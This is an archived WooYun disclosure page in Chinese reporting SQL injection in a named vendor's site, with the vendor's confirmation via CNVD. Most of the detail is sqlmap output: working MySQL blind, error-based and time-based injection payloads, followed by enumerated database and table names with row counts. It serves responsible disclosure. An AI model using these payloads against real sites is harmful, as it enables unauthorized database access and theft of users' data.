当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166994

漏洞标题:安康家园某处SQL注入导致全站数据泄露

相关厂商:安康家园

漏洞作者: 花式

提交时间:2016-01-05 01:10

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

rt

详细说明:

http://**.**.**.**/index/list?topic=0&sortid=13


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: topic=0 RLIKE (SELECT (CASE WHEN (3524=3524) THEN 0 ELSE 0x28 END))&sortid=13
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: topic=0 AND (SELECT 4243 FROM(SELECT COUNT(*),CONCAT(0x716a6a6271,(SELECT (ELT(4243=424
3,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sortid=1
3
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: topic=0 AND (SELECT * FROM (SELECT(SLEEP(5)))GWIX)&sortid=13
---
[12:52:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.12, PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[12:52:16] [INFO] fetching database names
[12:52:16] [INFO] the SQL query used returns 12 entries
[12:52:16] [INFO] resumed: information_schema
[12:52:16] [INFO] resumed: ankang_bbs
[12:52:16] [INFO] resumed: ankang_cms
[12:52:16] [INFO] resumed: ankang_ucent
[12:52:16] [INFO] resumed: app_jbw
[12:52:16] [INFO] resumed: kim_appadmin
[12:52:16] [INFO] resumed: kim_appcms
[12:52:16] [INFO] resumed: mysql
[12:52:16] [INFO] resumed: openfire
[12:52:16] [INFO] resumed: performance_schema
[12:52:16] [INFO] resumed: platform
[12:52:16] [INFO] resumed: test
available databases [12]:
[*] ankang_bbs
[*] ankang_cms
[*] ankang_ucent
[*] app_jbw
[*] information_schema
[*] kim_appadmin
[*] kim_appcms
[*] mysql
[*] openfire
[*] performance_schema
[*] platform
[*] test

漏洞证明:

Database: test
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| pro_security_student_signin | 600086 |
| pro_security_define | 38408 |
| pro_security_class_signin | 30197 |
| task_log | 21320 |
| pro_security_laws | 14378 |
| pro_security_class_check | 12642 |
| food_col | 6583 |
| pro_security_roles | 5079 |
| pro_security_student | 4105 |
| actionlog | 4095 |
| china | 3331 |
| pro_security_ohs | 3219 |
| user_bs | 2835 |
| pro_security_role_user | 1117 |
| food_main | 849 |
| pro_security_user | 691 |
| app_organization | 531 |
| app_tokens | 368 |
| app_db_config | 354 |
| app_setup_log | 344 |
| app_repos | 309 |
| task | 299 |
| deploy_rj | 182 |
| pro_security_accidentevent | 145 |
| user_limit | 65 |
| pro_security_define_type | 30 |
| message | 26 |
| `user` | 17 |
| app_info | 17 |
| app_infos | 15 |
| app_match_rules | 15 |
| expired_rules | 15 |
| customer_appid | 13 |
| product_cate | 6 |
| cloud_token | 3 |
| customer | 3 |
| admin | 2 |
| config | 2 |
| product | 2 |
| product_versions | 2 |
| app_info_field | 1 |
| bug66124 | 1 |
| roles | 1 |
| site | 1 |
| user_old | 1 |
+-----------------------------+---------+


Database: kim_appadmin
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| sign | 358942 |
| log | 37669 |
| message | 13827 |
| dietarytmp | 11667 |
| messagelist | 9545 |
| `user` | 5185 |
| userinfo | 5185 |
| role | 4603 |
| sms | 524 |
| class | 523 |
| area | 432 |
| weather | 207 |
| school | 174 |
| messageconfirm | 111 |
| push_rel | 30 |
| remindlist | 13 |
| finance | 6 |
| addressbooktype | 2 |
| feedback | 1 |
+-----------------+---------+

修复方案:

版权声明:转载请注明来源 花式@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-08 20:06

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无